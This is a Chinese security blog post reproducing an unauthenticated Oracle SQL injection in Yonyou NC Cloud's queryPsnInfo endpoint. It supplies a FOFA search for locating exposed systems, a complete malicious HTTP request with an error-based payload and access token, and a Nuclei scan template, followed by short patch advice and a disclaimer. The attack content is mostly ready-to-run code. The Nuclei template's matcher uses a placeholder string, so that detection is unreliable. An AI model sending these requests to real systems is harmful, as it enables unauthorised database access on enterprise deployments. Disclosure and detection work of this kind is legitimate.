前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】用友NC Cloud系统queryPsnInfo接口SQL注入

【漏洞复现】用友NC Cloud系统queryPsnInfo接口SQL注入

作者头像
没事就要多学习
发布2024-08-11 08:42:10
1310
发布2024-08-11 08:42:10
举报
文章被收录于专栏:Cyber Security

0x00 漏洞描述

用友NC Cloud存是一款大型企业数字化平台。 在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

影响范围

尚不明确

0x01 测绘工具

FOFA:app=“用友-NC-Cloud”

0x02 漏洞复现

代码语言:javascript
复制
GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

0x03 Nuclei检测脚本

代码语言:javascript
复制
id: 用友NC Cloud系统queryPsnInfo接口SQL注入

info:
  name: 用友NC Cloud系统queryPsnInfo接口SQL注入
  author: admin
  severity: high
  description: 攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。
  tags: oracle,sql,injection,timing

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ncchr/pm/obj/queryPsnInfo?staffid=1'%20AND%201754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281754%3D1754%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--%20Nzkh"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
      Accept: text/html, image/gif, image/jpeg, */*; q=.2, */*; q=.2
      Connection: close

    matchers:
      - type: word
        words:
          - "expected-result" 

    extractors:
      - type: regex
        regex:
          - "未知的主机" 

0x04 修复建议

官方已发布升级补丁包,支持在线升级和离线补丁安装 使用WAF等设备对 /ncchr/pm/obj/queryPsnInfo 接口进行拦截

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-08-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 漏洞描述
    • 影响范围
    • 0x01 测绘工具
    • 0x02 漏洞复现
    • 0x03 Nuclei检测脚本
    • 0x04 修复建议
    • 0x05 免责声明
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档